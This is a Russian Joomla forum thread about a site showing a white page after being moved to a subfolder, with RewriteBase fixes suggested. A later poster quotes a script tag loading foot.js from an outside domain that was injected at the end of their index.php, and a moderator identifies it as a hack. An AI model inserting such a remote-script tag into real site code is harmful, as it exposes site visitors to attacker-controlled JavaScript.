Админка работает, сайт - нет.

Тема в разделе "Перенос Joomla на хостинг и проблемы с хостингом", создана пользователем Yura2010, 28.06.2010.

  1. Offline

    Yura2010 Недавно здесь

    Регистрация:
    12.03.2010
    Сообщения:
    37
    Симпатии:
    0
    Пол:
    Мужской
    Перенес сайт с локалки на хостинг, но не в корень, а в _http://www.sitename.ru/new/
    Админка работает, а сайт не хочет отображаться (показывает белую страницу).
    Старая версия сайта (тоже на джумле) _http://www.sitename.ru отображается нормально. Заказчик просит новую версию сайта выложить в /new/ для тестирования, потом, если все ОК, переместить в основную.
    В чем может быть проблема?
     
    Последнее редактирование модератором: 29.06.2010
  2.  
  3. woojin
    Offline

    woojin Местный Команда форума

    Регистрация:
    31.05.2009
    Сообщения:
    3 209
    Симпатии:
    335
    Пол:
    Мужской
    скажи заказчику что "ШАРИК" - он, "БАЛБЕС"
    и если хочет потестить новый сайт то пускай берет новое тестовое имя на хостинге ил проще тестирует его с твоего локального хостинга!!!!!!

    у меня к примеру все заказчики смотрят на свои сайты или сразу на хостинге ил пока он лежит на локалке
     
  4. DKraev
    Offline

    DKraev <i>(aka gft)</i>

    Регистрация:
    16.08.2008
    Сообщения:
    1 627
    Симпатии:
    216
    Пол:
    Мужской
    А для чего??? У меня некоторые тоже просят сначала заливать сайт в подпапку... Что в этом необычного?


    Yura2010, Посмотрите пути в конфигурационном файле. Если не поможет, попробуйте в .htaccess сайта в папке new заменить

    Код (PHP):
    1. RewriteBase /


    на

    Код (PHP):
    1. RewriteBase /new/


    Так же смотрите чтобы RewriteBase не был закомментирован.
     
  5. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    Необычно то, что некоторых веб-мастеров пугает белая страница. B)
     
  6. DKraev
    Offline

    DKraev <i>(aka gft)</i>

    Регистрация:
    16.08.2008
    Сообщения:
    1 627
    Симпатии:
    216
    Пол:
    Мужской
  7. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    Оффтопик (не в тему) - жми сюда!
     
  8. Offline

    alex808 Недавно здесь

    Регистрация:
    12.10.2011
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской
    Привет всем, не знаю в тему или нет короче , админка работает нормально, а после перехода на сайт ofina.ru выдает вот такую ошибку (Parse error: syntax error, unexpected '<' in /home/users1/a/alex808/domains/alex808.jino.ru/index.php on line 89) открываю скрипт index.php там стоит (echo JResponse::toString($mainframe->getCfg('gzip'));
    <script src="http://templaties.com/foot.js"></script>), это получается последняя строка, нужна помощ !!!
    Еще точно также на втором сайте referraty.ru (оба сайта на хостинге jino.ru) может это ошибка на хостинге ? В общем что делать?
     
  9. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 036
    Симпатии:
    518
    Пол:
    Мужской
    Хакнули тебя.Убери этот скрипт,что начинается с '<' ,и чисти Joomla!
     

Поделиться этой страницей

Загрузка...